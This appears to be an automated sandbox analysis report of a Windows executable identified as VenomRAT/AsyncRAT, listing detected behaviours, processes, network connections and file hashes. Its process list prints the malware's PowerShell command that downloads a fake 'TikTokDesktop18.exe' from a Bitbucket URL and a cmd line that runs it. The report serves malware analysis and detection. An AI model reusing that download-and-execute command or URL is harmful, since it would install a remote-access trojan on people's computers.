Analysis Overview
SHA256
b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8
Threat Level: Known bad
The file b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe was found to be: Known bad.
Malicious Activity Summary
Venomrat family
VenomRAT
Asyncrat family
AsyncRat
Downloads MZ/PE file
Blocklisted process makes network request
Loads dropped DLL
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Suspicious use of SetThreadContext
Unsigned PE
System Location Discovery: System Language Discovery
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-27 12:32
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-27 12:32
Reported
2024-11-27 12:34
Platform
win7-20240903-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe
"C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8102.tmp\8103.tmp\8104.bat C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\8102.tmp\8103.tmp\8104.bat
| MD5 | 1904675eec0f302424c4bde0956dab54 |
| SHA1 | 267c3174e35e0e2a7d104f98b3326f313f2e464e |
| SHA256 | 45fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6 |
| SHA512 | fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3 |
memory/2580-6-0x000007FEF601E000-0x000007FEF601F000-memory.dmp
memory/2580-7-0x000000001B590000-0x000000001B872000-memory.dmp
memory/2580-10-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp
memory/2580-9-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp
memory/2580-8-0x0000000002870000-0x0000000002878000-memory.dmp
memory/2580-11-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp
memory/2580-12-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-27 12:32
Reported
2024-11-27 12:34
Platform
win10v2004-20241007-en
Max time kernel
102s
Max time network
118s
Command Line
Signatures
AsyncRat
Asyncrat family
VenomRAT
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Venomrat family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4636 set thread context of 3136 | N/A | C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe
"C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B0D1.tmp\B0D2.tmp\B0D3.bat C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;
C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe
C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe ;
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 54.231.168.33:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.142.166.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.168.231.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | tcp | |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | tcp | |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | tcp | |
| RU | 212.15.49.155:4449 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\B0D1.tmp\B0D2.tmp\B0D3.bat
| MD5 | 1904675eec0f302424c4bde0956dab54 |
| SHA1 | 267c3174e35e0e2a7d104f98b3326f313f2e464e |
| SHA256 | 45fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6 |
| SHA512 | fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3 |
memory/4152-2-0x00007FFCED2A3000-0x00007FFCED2A5000-memory.dmp
memory/4152-8-0x0000020D2C280000-0x0000020D2C2A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_csk0b3eh.uwp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4152-13-0x00007FFCED2A0000-0x00007FFCEDD61000-memory.dmp
memory/4152-14-0x00007FFCED2A0000-0x00007FFCEDD61000-memory.dmp
memory/4152-18-0x00007FFCED2A0000-0x00007FFCEDD61000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe
| MD5 | e619fff5751a713cf445da24a7a12c94 |
| SHA1 | 9fc67a572c69158541aaaab0264607ada70a408c |
| SHA256 | 11fbd295494309d56d775a11f805544737ce71d058a716194c0fd5b800cdc6d9 |
| SHA512 | 07420c9a0336ae350567abf68d7f5ef52b34c4c010dbabae6693bf27fd5a50a8b2b16696a3bed7bdc846d542eb04ce6102d5387484f352f9d09c8789ccfcd9ae |
memory/4636-22-0x00000000747BE000-0x00000000747BF000-memory.dmp
memory/4636-23-0x00000000002D0000-0x0000000000356000-memory.dmp
memory/4636-24-0x0000000002660000-0x0000000002666000-memory.dmp
memory/4636-25-0x000000000A920000-0x000000000AE4C000-memory.dmp
C:\Users\Admin\AppData\Roaming\gdi32.dll
| MD5 | 8d662564d514751028c65d96c696271f |
| SHA1 | 8e27943b7b901a808d39a7ee6977e1d3769a15fb |
| SHA256 | 86af5d6ee9d824ec2dfa73f44b9ae285d33e9748a8b6dbd4333d1ae06cf6f72b |
| SHA512 | 0a5460bbe7f43db560a08e508381613098a28de208a9d85c9c41fffa62b1e0299389a575dfa2b78767d3dd0fc73f0c88677ca32d7fe4e87698def1386cf35bef |
memory/3136-32-0x0000000000540000-0x000000000056C000-memory.dmp
memory/3136-34-0x0000000005430000-0x00000000059D4000-memory.dmp
memory/3136-36-0x0000000005130000-0x00000000051C2000-memory.dmp
memory/3136-37-0x0000000005100000-0x000000000510A000-memory.dmp